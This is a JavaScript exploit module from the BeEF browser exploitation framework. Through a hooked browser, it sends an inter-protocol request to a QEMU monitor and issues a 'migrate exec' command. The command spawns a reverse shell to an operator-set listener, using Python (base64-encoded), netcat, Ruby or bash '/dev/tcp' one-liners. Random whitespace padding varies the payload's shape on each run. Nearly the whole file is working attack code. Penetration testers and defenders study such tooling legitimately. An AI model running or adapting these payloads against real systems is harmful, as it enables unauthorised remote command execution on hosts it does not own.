GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/qemu_monitor_migrate_cmd_exec/command.js
//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
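beef.execute(function() {
  // Target QEMU monitor (HMP) reachable from the hooked browser, and the
  // listener the reverse shell should call back to. All of these are
  // rendered into this script by BeEF from the module options (ERB tags)
  // before it is delivered to the hooked browser.
  var rhost = '<%= @rhost %>';
  var rport = '<%= @rport %>';
  var lhost = '<%= @lhost %>';
  var lport = '<%= @lport %>';
  var timeout = 5;
  var payload_name = '<%= @payload %>';
  var peer = rhost + ':' + rport;

  // Build the HMP command `migrate "exec:<one-liner>"` for the selected
  // reverse-shell flavour. lhost/lport are concatenated verbatim: they are
  // operator-supplied (module options), not target-controlled, but a value
  // containing a quote or shell metacharacter will break the command rather
  // than be escaped.
  //
  // Declared with `var` on purpose: the previous version assigned to an
  // undeclared `payload`, i.e. an implicit global on the hooked page that
  // could collide with another BeEF module running at the same time.
  var payload = function() {
    // Random run of 3..12 spaces. The length is drawn once here; re-drawing
    // it in the loop condition (as before) still yielded 3..12 but skewed
    // the distribution. Presumably this exists to vary the on-the-wire
    // shape of the one-liner.
    var pad_len = Math.floor(Math.random() * 10) + 3;
    var whitespace = new Array(pad_len + 1).join(' ');

    // Inner double quotes are emitted as \" because the whole one-liner
    // ends up inside the double-quoted argument of `migrate "exec:..."`.
    var cmd_line = '';
    switch (payload_name) {
      case "reverse_python2":
        var cmd = "import socket,subprocess,os;host='"+lhost+"';port="+lport+";s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);";
        // Pad around statement/argument separators before encoding so the
        // base64 blob itself differs from run to run.
        cmd = cmd.replace(/,/g, whitespace+','+whitespace).replace(/;/g, whitespace+';'+whitespace);
        var encoded_cmd = btoa(cmd);
        // str.decode('base64') only exists in Python 2, hence /usr/bin/python2.
        cmd_line = "/usr/bin/python2 -c \\\"exec ( '" + encoded_cmd + "'.decode ( 'base64' ) )\\\"";
        break;
      case "reverse_netcat":
        // NOTE(review): `-e` is not honoured by every netcat build (the
        // OpenBSD variant drops it); confirm the target's /bin/nc supports it.
        cmd_line = "/bin/nc " + lhost + " " + lport + " -e /bin/sh";
        break;
      case "reverse_ruby":
        cmd_line = "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\\\"" + lhost + "\\\",\\\"" + lport + "\\\");while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end'";
        break;
      default: // "reverse_bash"
        cmd_line = "/bin/bash -c '/bin/bash -i >& /dev/tcp/" + lhost + "/" + lport + " 0>&1'";
        break;
    }

    // Every single space in the one-liner becomes the random-length run
    // (identical for all flavours, so it is applied once here).
    cmd_line = cmd_line.replace(/ /g, whitespace);
    return 'migrate "exec:' + cmd_line + '"';
  };

  // Handle to the IPEC iframe so it can be torn down after the request.
  var iframe_<%= @command_id %>;

  // Remove the iframe once the request has had time to leave the browser.
  // A failure here is only logged: the request has already been made.
  // Kept local (not an implicit global) for the same collision reason as
  // `payload` above.
  var cleanup = function() {
    try {
      document.body.removeChild(iframe_<%= @command_id %>);
    } catch(e) {
      beef.debug("[qemu_monitor_migrate_cmd_exec] Could not remove iframe: " + e.message);
    }
  };

  try {
    var code = payload();
    beef.debug("[qemu_monitor_migrate_cmd_exec] " + peer + " - Sending payload (" + code.length + " bytes)");
    // Inter-protocol request from the hooked browser to rhost:rport (the
    // exact form/encoding is decided by beef.dom.createIframeIpecForm). No
    // response is read here, so the reported result only records that the
    // attempt was made — confirm success at the lhost:lport listener.
    iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/", code);
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
  } catch(e) {
    // Report the failure to the operator as well, not only to the debug log.
    beef.debug("[qemu_monitor_migrate_cmd_exec] " + peer + " - Exploit failed: " + e.message);
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit failed: " + e.message);
  }

  // Pass the function rather than the string "cleanup()": the string form
  // is evaluated in the global scope, which is why `cleanup` previously had
  // to be a global and could have run another module's cleanup instead.
  setTimeout(cleanup, timeout * 1000);
});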